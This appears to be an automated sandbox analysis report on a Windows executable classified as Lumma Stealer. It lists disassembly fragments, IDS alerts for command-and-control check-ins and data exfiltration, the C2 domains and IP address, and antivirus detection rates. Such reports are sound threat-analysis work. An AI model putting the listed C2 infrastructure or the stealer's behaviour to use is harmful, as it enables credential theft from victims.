Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+6AB32A06h]	0_2_009F46F0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-06E9A8FEh]	0_2_009E07F0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA7F80h]	0_2_009DC74B
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	0_2_00A088E3
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_009E28F8
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-444800C2h]	0_2_009F08F0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	0_2_009F08F0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	0_2_00A0A980
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	0_2_00A0A980
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov word ptr [ebp+00h], cx	0_2_009EA950
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then jmp ecx	0_2_009F4948
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_009F6AF0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h	0_2_00A0EA10
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_009D2CEC
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx edi, byte ptr [edx+ecx+15B2AB34h]	0_2_009D2CEC
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov dword ptr [esp+2Ch], ebx	0_2_009D0C50
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 7A542AABh	0_2_00A0ED50
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ebp, word ptr [ecx]	0_2_00A0ED50
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov dword ptr [esp], edx	0_2_009E2EFA
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_009F8F93
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_009F8F93
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_009F8F82
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_009F8F82
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_009F8F44
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_009F8F44
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	0_2_00A070E0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80AFh]	0_2_00A070E0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	0_2_009F500F
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_009DB040
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_009F9063
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80A4h]	0_2_009E1160
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 64DAE379h	0_2_009E1160
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], CA198B66h	0_2_009E1160
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_009E2E97
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_009E2E97
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA7F80h]	0_2_009DD25F
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA7F80h]	0_2_009DC74B
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	0_2_009E3382
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov edx, dword ptr [ebp-24h]	0_2_009F3343
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx esi, byte ptr [ebx+edx]	0_2_009F3343
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00A03350
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov dword ptr [esp+000000D0h], 00000000h	0_2_009DD361
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_009F9404
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_009F5430
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov edx, dword ptr [ebp-24h]	0_2_009F3680
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx esi, byte ptr [ebx+edx]	0_2_009F3680
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	0_2_00A0B6F3
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov ecx, dword ptr [00A18390h]	0_2_009D37A2
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_009F77FA
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movsx esi, byte ptr [ebx+eax]	0_2_00A0D750
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+esi]	0_2_00A0D750
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx-6A88C35Ch]	0_2_00A0D750
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2Ch]	0_2_009F1760
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then jmp eax	0_2_009F1760
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	0_2_009F1760
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_009F7899
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-1Ah]	0_2_00A0B88A
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_009F783A
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov dword ptr [esp+000000D0h], 00000000h	0_2_009DD91E
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movsx esi, byte ptr [ebx+eax]	0_2_00A0DAF0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+esi]	0_2_00A0DAF0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx-6A88C35Ch]	0_2_00A0DAF0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80AFh]	0_2_00A07A40
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	0_2_009E9CE0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h]	0_2_00A0FD60
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_009F9E9A
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_009F9E9A
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+ecx]	0_2_009CBEA0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_009F3E60
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx-6A88C35Ch]	0_2_00A0DF90
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [ecx], dl	0_2_009DDF2A

Source: Network traffic	Suricata IDS: 2060538 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gadgethgfub .icu) : 192.168.2.4:58036 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060536 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explorebieology .run) : 192.168.2.4:56573 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49734 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49737 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49740 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49736 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49739 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49733 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49738 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49735 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49740 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49738 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49739 -> 104.21.31.208:443

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.31.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.31.208:443

Source: JqGBbm7.exe	Virustotal: Detection: 69%			Perma Link
Source: JqGBbm7.exe	ReversingLabs: Detection: 73%

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: gadgethgfub.icu
Source: global traffic	DNS traffic detected: DNS query: explorebieology.run
Source: global traffic	DNS traffic detected: DNS query: tse1.mm.bing.net

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report JqGBbm7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
JqGBbm7.exe